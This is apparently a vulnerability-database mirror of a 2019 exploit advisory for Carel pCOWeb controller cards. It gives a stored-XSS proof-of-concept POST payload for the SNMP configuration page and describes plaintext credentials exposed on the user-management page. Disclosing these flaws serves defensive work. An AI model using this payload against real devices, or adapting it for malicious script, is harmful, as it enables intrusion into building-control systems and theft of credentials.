Lucene search
+L

Carel pCOWeb Cross Site Scripting / Credential Disclosure

🗓️ 20 May 2019 00:00:00Reported by Luca.ChiouType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 103 Views

Carel pCOWeb - Stored XSS and Unprotected Storage of Credential

Code
`# Exploit Title: Carel pCOWeb - Stored XSS  
# Date: 2019-04-16  
# Exploit Author: Luca.Chiou  
# Vendor Homepage: https://www.carel.com/  
# Version: Carel pCOWeb all versions prior to B1.2.1  
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card  
  
# 1. Description:  
# In Carel pCOWeb web page,  
# user can modify the system configuration by access the /config/pw_snmp.html.  
# Attackers can inject malicious XSS code in post data.  
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.  
  
# 2. Proof of Concept:  
# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html  
# Send this post data:  
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E  
# The post data in URL decode format is:  
?script:setdb('snmp','syscontact')="><script>alert(123)</script>  
  
  
  
# Exploit Title: Carel pCOWeb - Unprotected Storage of Credentials  
# Date: 2019-04-16  
# Exploit Author: Luca.Chiou  
# Vendor Homepage: https://www.carel.com/  
# Version: Carel pCOWeb all versions prior to B1.2.1  
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card  
  
# 1. Description:  
# The devices, Carel pCOWeb, store plaintext passwords,  
# which may allow sensitive information to be read by someone with access to the device.  
  
# 2. Proof of Concept:  
# Browse the maintain user page in website:  
# http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html  
# The user's information include Description, Username and Password.  
# In user page, we can find out that user passwords stored in plaintext.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation